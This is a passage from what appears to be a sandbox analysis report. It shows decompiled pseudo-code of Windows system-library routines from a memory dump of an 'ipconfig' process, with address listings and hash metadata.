												E02ED37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x2f87b10 =  *0x2f87b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x2f87b04 =  *0x2f87b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L02EB77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L02EB77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x2f87b08 =  *0x2f87b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E02ED57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E02EDF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L02EB77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E02ECA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L02EB77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E02ED96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































              0x02ea849b
              0x02ea849b
              0x02ea849b
              0x02ea849b
              0x02ea849d
              0x02ea84a2
              0x02ea84a7
              0x02ea84b1
              0x02ea84d8
              0x00000000
              0x02ea84b3
              0x02ea84c4
              0x02ea84c9
              0x02ea84cd
              0x02ea84cf
              0x02ea84cf
              0x02ea84d6
              0x02ea84e6
              0x02ea84e9
              0x02ea84ec
              0x02ea84ef
              0x02ea84f2
              0x02ea84f4
              0x02ea84fc
              0x02ea8501
              0x02ea8506
              0x02ea8509
              0x02ea86e0
              0x02ea86e5
              0x02ea86e8
              0x02ea86ed
              0x02ea86f0
              0x02ea86f2
              0x02ef9afd
              0x02ef9b02
              0x02ea84da
              0x02ea84df
              0x02ea84df
              0x02ea86fa
              0x02ea86fd
              0x02ea86fe
              0x02ea8701
              0x02ea8706
              0x02ea8709
              0x02ea870b
              0x00000000
              0x00000000
              0x02ea8711
              0x02ea8725
              0x02ea8727
              0x02ea872a
              0x02ea872c
              0x02ef9af0
              0x02ef9af5
              0x02ea8732
              0x02ea8732
              0x02ea8732
              0x02ea8735
              0x02ea8737
              0x02ea8515
              0x02ea8515
              0x02ea8518
              0x02ea851d
              0x02ea8523
              0x02ea8527
              0x02ea852b
              0x02ea8537
              0x02ea8539
              0x02ea853c
              0x02ea853e
              0x02ea868c
              0x02ea8691
              0x02ea8699
              0x02ea869b
              0x02ea8744
              0x02ea8748
              0x02ea86a1
              0x02ea86a1
              0x02ea86a1
              0x02ea86a4
              0x02ea86a8
              0x02ef9bdf
              0x02ef9bdf
              0x02ea86ae
              0x02ea86b0
              0x00000000
              0x02ea86b6
              0x00000000
              0x02ef9be9
              0x02ea86b0
              0x02ea8544
              0x02ea854a
              0x02ea854d
              0x02ea8551
              0x02ea876e
              0x02ea8778
              0x02ea877b
              0x02ea8780
              0x02ea8557
              0x02ea8557
              0x02ea855d
              0x02ea855d
              0x02ea856b
              0x02ea856e
              0x02ea8570
              0x02ea8573
              0x02ea8576
              0x02ea8576
              0x02ea8579
              0x02ea857b
              0x00000000
              0x00000000
              0x02ea8581
              0x02ea85a0
              0x02ea85a2
              0x02ea85a5
              0x02ea85a7
              0x02ef9b1b
              0x02ef9b1b
              0x02ea862e
              0x02ea862e
              0x02ea8631
              0x02ea8631
              0x02ea8634
              0x02ea8636
              0x02ea8669
              0x02ea8669
              0x02ea866b
              0x02ef9bbf
              0x02ef9bc4
              0x02ef9bc8
              0x02ef9bce
              0x02ef9bce
              0x02ea8671
              0x02ea8671
              0x02ea8674
              0x02ea8676
              0x02ef9bae
              0x02ef9bae
              0x02ea8676
              0x02ea867c
              0x02ea867e
              0x02ea8688
              0x02ea8688
              0x00000000
              0x02ea867e
              0x02ea8638
              0x02ea8638
              0x02ea863b
              0x02ea863e
              0x02ea863f
              0x02ea8642
              0x02ea8645
              0x02ea8648
              0x02ea864d
              0x02ef9b69
              0x02ef9b6e
              0x02ef9b7b
              0x02ef9b81
              0x02ef9b85
              0x02ef9b89
              0x02ef9ba7
              0x02ef9b8b
              0x02ef9b91
              0x02ef9b9a
              0x02ef9b9f
              0x02ef9b9f
              0x02ea8788
              0x02ea878d
              0x02ea8763
              0x02ea8763
              0x02ea8766
              0x00000000
              0x02ea8766
              0x02ef9b70
              0x00000000
              0x02ef9b70
              0x02ea8656
              0x02ea865a
              0x02ea865c
              0x02ea8752
              0x02ea8756
              0x00000000
              0x00000000
              0x02ea875e
              0x00000000
              0x02ea875e
              0x02ea8662
              0x02ea8662
              0x02ea8662
              0x02ea8666
              0x00000000
              0x02ea8666
              0x02ea85b7
              0x02ea85b9
              0x02ea85bc
              0x02ea85bf
              0x02ea85cc
              0x02ea85d1
              0x02ea85d4
              0x02ea85db
              0x02ea85de
              0x02ea85e0
              0x02ef9b5f
              0x00000000
              0x02ef9b5f
              0x02ea85e6
              0x02ea85ea
              0x02ea86c3
              0x02ea86c5
              0x02ea86c8
              0x02ea86ca
              0x02ef9b16
              0x00000000
              0x02ef9b16
              0x02ea86d6
              0x02ea85f6
              0x02ea85f6
              0x02ea85f9
              0x02ea8602
              0x02ea8606
              0x02ea860a
              0x02ea860b
              0x02ea860e
              0x02ea8611
              0x00000000
              0x02ea8611
              0x02ea85f3
              0x00000000
              0x02ea85f3
              0x02ea8619
              0x02ea861e
              0x02ea861e
              0x02ea8621
              0x02ea8622
              0x02ea8623
              0x02ea8625
              0x02ea862c
              0x00000000
              0x02ea873d
              0x00000000
              0x02ea873d
              0x02ea8737
              0x02ea850f
              0x02ea8512
              0x00000000
              0x02ea8512
              0x00000000
              0x02ea84d6

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fe1fb4d75054723ffea70cd92fb49ec6ffd13df7428a5689e5f62a7888d88d5e
              • Instruction ID: a9de15188a51025e63724ba416d7e1b274f955c1d56369e629e25e984d4af720
              • Opcode Fuzzy Hash: fe1fb4d75054723ffea70cd92fb49ec6ffd13df7428a5689e5f62a7888d88d5e
              • Instruction Fuzzy Hash: E6B15B74E40249DFDB19DFA8C9A4BEEFBB6BF84308F109129E505AB645D770A841CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC513A Relevance: .3, Instructions: 258COMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E02EC513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x2f8d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E02EDD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E02EB2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L02EB4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E02EDF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E02EAFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x2f8b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E02EDB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































              0x02ec5142
              0x02ec514c
              0x02ec5150
              0x02ec5157
              0x02ec5159
              0x02ec515e
              0x02ec5165
              0x02ec5169
              0x02ec516c
              0x02ec5172
              0x02ec5176
              0x02ec517a
              0x02ec517a
              0x02ec517a
              0x02ec517f
              0x02f06d8b
              0x02f06d8e
              0x02f06d91
              0x02f06d95
              0x02f06d98
              0x02f06d9c
              0x02f06da0
              0x02f06da3
              0x02f06da7
              0x02f06e26
              0x02f06e26
              0x02f06e2a
              0x02ec51f9
              0x02ec51f9
              0x02ec51fe
              0x02f06e33
              0x02f06e33
              0x02f06e39
              0x02f06e3d
              0x02f06e46
              0x02f06e50
              0x00000000
              0x00000000
              0x02f06e52
              0x02f06e53
              0x02f06e56
              0x02f06e5d
              0x00000000
              0x00000000
              0x00000000
              0x02f06e5f
              0x02f06e67
              0x02f06e77
              0x02f06e7f
              0x02f06e80
              0x02f06e88
              0x02f06e90
              0x02f06e9f
              0x02f06ea5
              0x02f06ea9
              0x02f06eb1
              0x02f06ebf
              0x00000000
              0x00000000
              0x02f06ecf
              0x02f06ed3
              0x00000000
              0x00000000
              0x02f06edb
              0x02f06ede
              0x02f06ee1
              0x02f06ee8
              0x02f06eeb
              0x02f06eed
              0x02f06ef0
              0x02f06ef4
              0x02f06ef8
              0x02f06efc
              0x00000000
              0x00000000
              0x02f06f0d
              0x02f06f11
              0x02f06f32
              0x02f06f37
              0x02f06f3b
              0x02f06f3e
              0x02f06f41
              0x02f06f46
              0x00000000
              0x00000000
              0x02f06f4c
              0x02f06f50
              0x02f06f50
              0x02f06f54
              0x02f06f62
              0x02f06f65
              0x02f06f6d
              0x02f06f7b
              0x02f06f7b
              0x02f06f93
              0x02f06f98
              0x02f06fa0
              0x02f06fa6
              0x02f06fb3
              0x02f06fb6
              0x02f06fbf
              0x02f06fc1
              0x02f06fd5
              0x02f06fda
              0x02f06fda
              0x02f06fdd
              0x02f06fe2
              0x02f06fe7
              0x02f06feb
              0x02f06fef
              0x02f06ff3
              0x02ec520c
              0x02ec520c
              0x02ec520f
              0x02ec5215
              0x02ec5234
              0x02ec523a
              0x02ec523a
              0x02ec5244
              0x02ec5245
              0x02ec5246
              0x02ec5251
              0x02ec5251
              0x02f06f13
              0x02f06f17
              0x02f06f17
              0x02f06f18
              0x02f06f1b
              0x02f06f1f
              0x02f06f23
              0x00000000
              0x02f06f28
              0x02ec5204
              0x02ec5204
              0x02ec5208
              0x00000000
              0x02ec5208
              0x02ec5185
              0x02ec5188
              0x02ec518a
              0x02ec518e
              0x02ec5195
              0x02f06db1
              0x02f06db5
              0x02f06db9
              0x02ec519b
              0x02ec519b
              0x02ec519e
              0x02ec51a7
              0x02ec51a9
              0x02ec51a9
              0x02ec51b5
              0x02ec51b8
              0x02ec51bb
              0x02ec51be
              0x02ec51c1
              0x02ec51c5
              0x02ec51c9
              0x02ec51cd
              0x02ec51cd
              0x02ec51d8
              0x02ec51dc
              0x02ec51e0
              0x02f06dcc
              0x02f06dd0
              0x02f06dd5
              0x02f06ddd
              0x02f06de1
              0x02f06de1
              0x02f06de5
              0x02f06deb
              0x02f06df1
              0x02f06df7
              0x02f06dfd
              0x02f06e01
              0x02f06e05
              0x02f06e09
              0x02f06e0d
              0x02f06e11
              0x02f06e11
              0x02ec51eb
              0x02f06e1a
              0x02f06e1f
              0x02f06e21
              0x02f06e23
              0x00000000
              0x02ec51f1
              0x02ec51f1
              0x00000000
              0x02ec51f1

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a082da9271aa32c8f58218ecb7f67b80a218d158992770f0597e88b43f2debf4
              • Instruction ID: d64a9596beae75b7f6370926fb935263e3bbfb4ef8a952a4f708b8de674d917f
              • Opcode Fuzzy Hash: a082da9271aa32c8f58218ecb7f67b80a218d158992770f0597e88b43f2debf4
              • Instruction Fuzzy Hash: 7BC123755093808FD354CF28C580A5AFBF1BF88348F148A6EF9999B392D771E945CB42
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC03E2 Relevance: .3, Instructions: 254COMMON
              Download Yara Rule
              C-Code - Quality: 74%
              			E02EC03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x2f8d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E02EC0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E02EDB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E02EAB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x2f87c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E02EB7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E02EB7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E02F17016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E02ED9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E02F169A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x2f87c04 != 0) {
						_t118 = _v12;
						_t120 = E02F1A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x2f87bd8;
						if( *0x2f87bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E02ED95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E02ED99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E02F13540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E02E9B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E02EDAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x2f88474 - 3;
										if( *0x2f88474 != 3) {
											 *0x2f879dc =  *0x2f879dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E02EB7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E02EB7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E02F17016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x2f88708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x2f87b00; // 0x0
							asm("ror esi, cl");
							 *0x2f8b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E02ED95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E02EA7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































              0x02ec03f1
              0x02ec03f7
              0x02ec03f9
              0x02ec03fb
              0x02ec03fd
              0x02ec0400
              0x02ec040a
              0x02f04c7a
              0x02ec0537
              0x02ec0547
              0x02ec0410
              0x02ec0410
              0x02ec0414
              0x02ec0417
              0x02ec041a
              0x02ec0421
              0x02ec0424
              0x02ec042b
              0x02ec043b
              0x02ec043e
              0x02ec043f
              0x02ec043f
              0x02ec0446
              0x02ec0449
              0x02ec044c
              0x02ec044f
              0x02ec0459
              0x02f04c8d
              0x02ec045f
              0x02ec045f
              0x02ec045f
              0x02ec0467
              0x02f04c97
              0x02f04c9d
              0x02f04ca4
              0x02f04caa
              0x02f04caf
              0x02f04cb1
              0x02f04cc3
              0x02f04cb3
              0x02f04cbc
              0x02f04cbc
              0x02f04cc8
              0x02f04ccb
              0x02f04cd7
              0x02f04cda
              0x02f04cdf
              0x02f04cdf
              0x02f04ccb
              0x02f04ca4
              0x02ec046d
              0x02ec046f
              0x02ec046f
              0x02ec0471
              0x02ec0476
              0x02ec047a
              0x02ec047b
              0x02ec0483
              0x02ec0489
              0x02ec048d
              0x00000000
              0x00000000
              0x02f04ce9
              0x02f04cef
              0x02f04d22
              0x02f04d22
              0x00000000
              0x02f04d22
              0x02f04cf1
              0x02f04cf7
              0x00000000
              0x00000000
              0x02f04cf9
              0x02f04cff
              0x00000000
              0x00000000
              0x02f04d05
              0x02f04d07
              0x00000000
              0x00000000
              0x02f04d0d
              0x02f04d0f
              0x02f04d14
              0x02f04d16
              0x00000000
              0x00000000
              0x02f04d1c
              0x02f04d1c
              0x02ec0499
              0x02ec0535
              0x02ec0535
